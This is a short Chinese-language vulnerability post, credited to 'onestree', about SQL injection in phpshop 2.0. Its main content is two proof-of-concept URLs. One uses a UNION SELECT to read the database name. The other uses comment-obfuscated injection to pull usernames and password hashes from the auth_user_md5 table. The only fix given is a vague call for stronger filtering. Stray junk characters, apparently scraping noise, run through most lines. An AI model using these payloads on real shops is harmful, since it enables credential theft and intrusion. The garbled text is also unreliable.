标题 : phpshop 2.0 SQL Injection Vulnerability5 K- S6 N, V6 @
5 \/ L& X5 Y6 F8 {, m) g: }作者 : By onestree9 R% W2 L- p/ b& M2 V5 n# ?
下载地址 : http://code.google.com/p/phpshop/downloads/list
; n( O* f* u, i0 h0 s测试地址: windows 7 / ubuntu5 l8 g2 x+ v/ V3 y! Y8 a
8 L0 d; u6 X5 E1 X+ l
9 W$ H& \) g a( j5 WSQLi p0c:. p7 l# c1 k9 j& d1 M
0 L8 z: @# P# a==================: P1 b8 E( a% e) _( g U1 t
0 z6 y) p! v- Q% D4 } g
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
0 f, z! r8 a& X6 wunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --1 z& e6 `8 F6 x% [
' k: ~7 M- M( {8 \. P
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--- w9 A9 e* Z' d, c
! X0 ?; E5 L+ r& u8 |' ]
修复:( x" S1 b* [4 s0 C5 x
加强过滤
. h- K: Y4 d/ a) j4 K: e2 H$ \
( C1 z1 t; k8 r
9 w8 k1 g: M7 H1 C |